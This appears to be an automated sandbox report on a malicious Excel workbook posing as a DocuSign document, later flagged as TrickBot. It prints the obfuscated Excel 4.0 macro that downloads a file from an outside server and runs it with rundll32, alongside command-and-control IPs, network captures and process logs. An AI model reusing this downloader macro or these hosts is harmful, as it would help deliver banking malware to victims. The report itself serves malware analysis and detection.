                                                                                                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                                                                                                                                                                                            Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 157800
                                                                                                                                                                                            General
                                                                                                                                                                                            Stream Path:Workbook
                                                                                                                                                                                            File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                                            Stream Size:157800
                                                                                                                                                                                            Entropy:7.46869820242
                                                                                                                                                                                            Base64 Encoded:True
                                                                                                                                                                                            Data ASCII:. . . . . . . . f 2 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . . .
                                                                                                                                                                                            Data Raw:09 08 10 00 00 06 05 00 66 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Macro 4.0 Code

,,,,,,,,,"=RIGHT(""353454543rtertetr,DllRegister"",12)&V19",,,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""KJHDFHURNVUTRSHYSTNLUURTHNBDZZLRDNYZru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&T19,40))",,,,,,,,=HALT(),,,
"=FORMULA.FILL(A144,DocuSign!V19)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""YJDYJGYDJNUDTUXTNXYXNuRlMon"",6)",,,,,,,,,,,,,,,,,,,"=RIGHT(""JDHNLTVJRBNZXKHTFHNMXTFUXTownloadToFileA"",14)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=REGISTER(D134,""URLD""&D135,""JJCC""&A146,""YUTVUBSRNYTMYM"",,1,9)",,,,,,,,,,,,,,,,,,,http://"=YUTVUBSRNYTMYM(0,T137&D144&E144&E145&E146&E147,D141,0,0)",,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""hLKUYFBGVESLTNZBRHYMHYRZndll32"",6)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""XCVBDSTYFGYSDUZGKLRDHZTDJ..\BASE.BABAA"",13)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=GOTO(DocuSign!T3),,,,,,,,,,,,,,,,,,,Server,,,www.chipmania.it/mails/open,.,,,,,,,,,,,,,,,,,,,p,,,,,,,,,,,,,,,BB,,,,h,,,,,,,,,,,,,,,,,,,p,,,,,,,,,,,,,,,

Network Behavior

Snort IDS Alerts

Timestamp                 Protocol  SID      Message                                                Source Port  Dest Port  Source IP      Dest IP
02/20/21-03:17:14.088896  TCP       2404306  ET CNC Feodo Tracker Reported CnC Server TCP group 4   49166        443        192.168.2.22   142.202.191.164
02/20/21-03:17:16.980781  TCP       2404302  ET CNC Feodo Tracker Reported CnC Server TCP group 2   49168        443        192.168.2.22   108.170.20.75
02/20/21-03:18:00.666014  TCP       2404324  ET CNC Feodo Tracker Reported CnC Server TCP group 13  49170        443        192.168.2.22   200.52.147.93
02/20/21-03:19:11.713314  TCP       2404316  ET CNC Feodo Tracker Reported CnC Server TCP group 9   49171        443        192.168.2.22   186.137.85.76

Network Port Distribution

TCP Packets

Timestamp                            Source Port  Dest Port  Source IP      Dest IP
Feb 20, 2021 03:17:03.575388908 CET  49165        80         192.168.2.22   185.81.0.78
Feb 20, 2021 03:17:03.632915020 CET  80           49165      185.81.0.78    192.168.2.22
Feb 20, 2021 03:17:03.633085966 CET  49165        80         192.168.2.22   185.81.0.78
Feb 20, 2021 03:17:03.634332895 CET  49165        80         192.168.2.22   185.81.0.78
Feb 20, 2021 03:17:03.691679001 CET  80           49165      185.81.0.78    192.168.2.22
Feb 20, 2021 03:17:03.699875116 CET  80           49165      185.81.0.78    192.168.2.22
Feb 20, 2021 03:17:03.699927092 CET  80           49165      185.81.0.78    192.168.2.22
Feb 20, 2021 03:17:03.699975967 CET  80           49165      185.81.0.78    192.168.2.22
Feb 20, 2021 03:17:03.700018883 CET  80           49165      185.81.0.78    192.168.2.22
Feb 20, 2021 03:17:03.700040102 CET  49165        80         192.168.2.22   185.81.0.78
Feb 20, 2021 03:17:03.700057983 CET  80           49165      185.81.0.78    192.168.2.22
Feb 20, 2021 03:17:03.700098991 CET  80           49165      185.81.0.78    192.168.2.22
Feb 20, 2021 03:17:03.700103045 CET  49165        80         192.168.2.22   185.81.0.78
Feb 20, 2021 03:17:03.700134039 CET  49165        80         192.168.2.22   185.81.0.78
Feb 20, 2021 03:17:03.700139046 CET  80           49165      185.81.0.78    192.168.2.22
Feb 20, 2021 03:17:03.700176954 CET  80           49165      185.81.0.78    192.168.2.22
Feb 20, 2021 03:17:03.700186014 CET  49165        80         192.168.2.22   185.81.0.78
Feb 20, 2021 03:17:03.700217009 CET  80           49165      185.81.0.78    192.168.2.22
Feb 20, 2021 03:17:03.700242996 CET  49165        80         192.168.2.22   185.81.0.78
Feb 20, 2021 03:17:03.700257063 CET  80           49165      185.81.0.78    192.168.2.22
Feb 20, 2021 03:17:03.700289011 CET  49165        80         192.168.2.22   185.81.0.78
Feb 20, 2021 03:17:03.700339079 CET  49165        80         192.168.2.22   185.81.0.78
Feb 20, 2021 03:17:03.709024906 CET  49165        80         192.168.2.22   185.81.0.78
Feb 20, 2021 03:17:03.759267092 CET  80           49165      185.81.0.78    192.168.2.22
Feb 20, 2021 03:17:03.759326935 CET  80           49165      185.81.0.78    192.168.2.22
Feb 20, 2021 03:17:03.759366989 CET  80           49165      185.81.0.78    192.168.2.22
Feb 20, 2021 03:17:03.759407997 CET  80           49165      185.81.0.78    192.168.2.22
Feb 20, 2021 03:17:03.759428978 CET  49165        80         192.168.2.22   185.81.0.78
Feb 20, 2021 03:17:03.759448051 CET  80           49165      185.81.0.78    192.168.2.22
Feb 20, 2021 03:17:03.759471893 CET  49165        80         192.168.2.22   185.81.0.78
Feb 20, 2021 03:17:03.759478092 CET  49165        80         192.168.2.22   185.81.0.78
Feb 20, 2021 03:17:03.759483099 CET  49165        80         192.168.2.22   185.81.0.78
Feb 20, 2021 03:17:03.759495974 CET  80           49165      185.81.0.78    192.168.2.22
Feb 20, 2021 03:17:03.759507895 CET  49165        80         192.168.2.22   185.81.0.78
Feb 20, 2021 03:17:03.759541988 CET  80           49165      185.81.0.78    192.168.2.22
Feb 20, 2021 03:17:03.759562969 CET  49165        80         192.168.2.22   185.81.0.78
Feb 20, 2021 03:17:03.759581089 CET  80           49165      185.81.0.78    192.168.2.22
Feb 20, 2021 03:17:03.759603024 CET  49165        80         192.168.2.22   185.81.0.78
Feb 20, 2021 03:17:03.759619951 CET  80           49165      185.81.0.78    192.168.2.22
Feb 20, 2021 03:17:03.759644985 CET  49165        80         192.168.2.22   185.81.0.78
Feb 20, 2021 03:17:03.759659052 CET  80           49165      185.81.0.78    192.168.2.22
Feb 20, 2021 03:17:03.759701967 CET  80           49165      185.81.0.78    192.168.2.22
Feb 20, 2021 03:17:03.759717941 CET  49165        80         192.168.2.22   185.81.0.78
Feb 20, 2021 03:17:03.759726048 CET  49165        80         192.168.2.22   185.81.0.78
Feb 20, 2021 03:17:03.759741068 CET  80           49165      185.81.0.78    192.168.2.22
Feb 20, 2021 03:17:03.759761095 CET  49165        80         192.168.2.22   185.81.0.78
Feb 20, 2021 03:17:03.759780884 CET  80           49165      185.81.0.78    192.168.2.22
Feb 20, 2021 03:17:03.759829044 CET  80           49165      185.81.0.78    192.168.2.22
Feb 20, 2021 03:17:03.759845972 CET  49165        80         192.168.2.22   185.81.0.78
Feb 20, 2021 03:17:03.759857893 CET  49165        80         192.168.2.22   185.81.0.78
Feb 20, 2021 03:17:03.759874105 CET  80           49165      185.81.0.78    192.168.2.22
Feb 20, 2021 03:17:03.759886980 CET  49165        80         192.168.2.22   185.81.0.78
Feb 20, 2021 03:17:03.759912014 CET  80           49165      185.81.0.78    192.168.2.22
Feb 20, 2021 03:17:03.759951115 CET  80           49165      185.81.0.78    192.168.2.22
Feb 20, 2021 03:17:03.759967089 CET  49165        80         192.168.2.22   185.81.0.78
Feb 20, 2021 03:17:03.759978056 CET  49165        80         192.168.2.22   185.81.0.78
Feb 20, 2021 03:17:03.759989977 CET  80           49165      185.81.0.78    192.168.2.22
Feb 20, 2021 03:17:03.760011911 CET  49165        80         192.168.2.22   185.81.0.78
Feb 20, 2021 03:17:03.760027885 CET  80           49165      185.81.0.78    192.168.2.22
Feb 20, 2021 03:17:03.760049105 CET  49165        80         192.168.2.22   185.81.0.78
Feb 20, 2021 03:17:03.760067940 CET  80           49165      185.81.0.78    192.168.2.22
Feb 20, 2021 03:17:03.760093927 CET  49165        80         192.168.2.22   185.81.0.78
Feb 20, 2021 03:17:03.760128975 CET  49165        80         192.168.2.22   185.81.0.78
Feb 20, 2021 03:17:03.760921955 CET  49165        80         192.168.2.22   185.81.0.78
Feb 20, 2021 03:17:03.818933964 CET  80           49165      185.81.0.78    192.168.2.22
Feb 20, 2021 03:17:03.819010019 CET  80           49165      185.81.0.78    192.168.2.22
Feb 20, 2021 03:17:03.819053888 CET  80           49165      185.81.0.78    192.168.2.22
Feb 20, 2021 03:17:03.819072962 CET  49165        80         192.168.2.22   185.81.0.78
Feb 20, 2021 03:17:03.819093943 CET  80           49165      185.81.0.78    192.168.2.22
Feb 20, 2021 03:17:03.819135904 CET  80           49165      185.81.0.78    192.168.2.22
Feb 20, 2021 03:17:03.819129944 CET  49165        80         192.168.2.22   185.81.0.78
Feb 20, 2021 03:17:03.819149017 CET  49165        80         192.168.2.22   185.81.0.78
Feb 20, 2021 03:17:03.819176912 CET  80           49165      185.81.0.78    192.168.2.22
Feb 20, 2021 03:17:03.819197893 CET  49165        80         192.168.2.22   185.81.0.78
Feb 20, 2021 03:17:03.819216013 CET  80           49165      185.81.0.78    192.168.2.22
Feb 20, 2021 03:17:03.819231987 CET  49165        80         192.168.2.22   185.81.0.78
Feb 20, 2021 03:17:03.819240093 CET  49165        80         192.168.2.22   185.81.0.78
Feb 20, 2021 03:17:03.819257021 CET  80           49165      185.81.0.78    192.168.2.22
Feb 20, 2021 03:17:03.819297075 CET  80           49165      185.81.0.78    192.168.2.22
Feb 20, 2021 03:17:03.819303036 CET  49165        80         192.168.2.22   185.81.0.78
Feb 20, 2021 03:17:03.819346905 CET  80           49165      185.81.0.78    192.168.2.22
Feb 20, 2021 03:17:03.819348097 CET  49165        80         192.168.2.22   185.81.0.78
Feb 20, 2021 03:17:03.819360018 CET  49165        80         192.168.2.22   185.81.0.78
Feb 20, 2021 03:17:03.819391012 CET  80           49165      185.81.0.78    192.168.2.22
Feb 20, 2021 03:17:03.819403887 CET  49165        80         192.168.2.22   185.81.0.78
Feb 20, 2021 03:17:03.819428921 CET  80           49165      185.81.0.78    192.168.2.22
Feb 20, 2021 03:17:03.819447994 CET  49165        80         192.168.2.22   185.81.0.78
Feb 20, 2021 03:17:03.819468975 CET  80           49165      185.81.0.78    192.168.2.22
Feb 20, 2021 03:17:03.819485903 CET  49165        80         192.168.2.22   185.81.0.78
Feb 20, 2021 03:17:03.819509983 CET  80           49165      185.81.0.78    192.168.2.22
Feb 20, 2021 03:17:03.819523096 CET  49165        80         192.168.2.22   185.81.0.78
Feb 20, 2021 03:17:03.819547892 CET  80           49165      185.81.0.78    192.168.2.22
Feb 20, 2021 03:17:03.819565058 CET  49165        80         192.168.2.22   185.81.0.78
Feb 20, 2021 03:17:03.819586992 CET  80           49165      185.81.0.78    192.168.2.22
Feb 20, 2021 03:17:03.819606066 CET  49165        80         192.168.2.22   185.81.0.78
Feb 20, 2021 03:17:03.819626093 CET  80           49165      185.81.0.78    192.168.2.22
Feb 20, 2021 03:17:03.819644928 CET  49165        80         192.168.2.22   185.81.0.78
Feb 20, 2021 03:17:03.819679022 CET  80           49165      185.81.0.78    192.168.2.22
Feb 20, 2021 03:17:03.819684029 CET  49165        80         192.168.2.22   185.81.0.78
Feb 20, 2021 03:17:03.819722891 CET  80           49165      185.81.0.78    192.168.2.22

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 20, 2021 03:17:03.494488001 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8
Feb 20, 2021 03:17:03.552203894 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22
Feb 20, 2021 03:17:15.065036058 CET | 53099 | 53 | 192.168.2.22 | 8.8.8.8
Feb 20, 2021 03:17:15.127029896 CET | 53 | 53099 | 8.8.8.8 | 192.168.2.22
Feb 20, 2021 03:17:15.140758991 CET | 52838 | 53 | 192.168.2.22 | 8.8.8.8
Feb 20, 2021 03:17:15.201056957 CET | 53 | 52838 | 8.8.8.8 | 192.168.2.22

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Feb 20, 2021 03:17:03.494488001 CET | 192.168.2.22 | 8.8.8.8 | 0x62a5 | Standard query (0) | www.chipmania.it | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Feb 20, 2021 03:17:03.552203894 CET | 8.8.8.8 | 192.168.2.22 | 0x62a5 | No error (0) | www.chipmania.it | chipmania.it | - | CNAME (Canonical name) | IN (0x0001)
Feb 20, 2021 03:17:03.552203894 CET | 8.8.8.8 | 192.168.2.22 | 0x62a5 | No error (0) | chipmania.it | - | 185.81.0.78 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• www.chipmania.it

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49165 | 185.81.0.78 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp | kBytes transferred | Direction | Data
Feb 20, 2021 03:17:03.634332895 CET | 0 | OUT | GET /mails/open.php HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: www.chipmania.it
Connection: Keep-Alive
Feb 20, 2021 03:17:03.699875116 CET | 2 | IN | HTTP/1.1 200 OK
Date: Sat, 20 Feb 2021 02:17:03 GMT
Server: Apache
Content-Disposition: attachment; filename="10.jjkes"
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Keep-Alive: timeout=1, max=100
Transfer-Encoding: chunked
Content-Type: application/octet-stream


HTTPS Packets

Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
Feb 20, 2021 03:17:14.477143049 CET | 142.202.191.164 | 443 | 192.168.2.22 | 49166 | CN=Koqnu, O=Qjvoobim, L=DavhlVuwmxy, C=ZZ | CN=Koqnu, O=Qjvoobim, L=DavhlVuwmxy, C=ZZ | Thu Oct 01 03:17:34 CEST 2020 | Sun Sep 29 03:17:34 CEST 2030 | 769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,10-11-23-65281,23-24,0 | 8c4a22651d328568ec66382a84fc505f

Code Manipulations

Statistics

Behavior

System Behavior

General

Start time: 03:16:30
Start date: 20/02/2021
Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit): false
Commandline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase: 0x13f910000
File size: 27641504 bytes
MD5 hash: 5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 03:16:36
Start date: 20/02/2021
Path: C:\Windows\System32\rundll32.exe
Wow64 process (32bit): false
Commandline: rundll32 ..\BASE.BABAA,DllRegisterServer
Imagebase: 0xff7d0000
File size: 45568 bytes
MD5 hash: DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 03:16:36
Start date: 20/02/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32 ..\BASE.BABAA,DllRegisterServer
Imagebase: 0x3c0000
File size: 44544 bytes
MD5 hash: 51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000002.2081720951.00000000005D8000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000003.2077502883.0000000000764000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000002.2081503635.0000000000130000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000003.2077497175.0000000000764000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000002.2081774299.0000000000730000.00000004.00000020.sdmp, Author: Joe Security
Reputation: moderate

General

Start time: 03:16:37
Start date: 20/02/2021
Path: C:\Windows\System32\wermgr.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\wermgr.exe
Imagebase: 0xffe10000
File size: 50688 bytes
MD5 hash: 41DF7355A5A907E2C1D7804EC028965D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

General

Start time: 03:16:37
Start date: 20/02/2021
Path: C:\Windows\System32\wermgr.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\wermgr.exe
Imagebase: 0xffe10000
File size: 50688 bytes
MD5 hash: 41DF7355A5A907E2C1D7804EC028965D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

Disassembly

Code Analysis
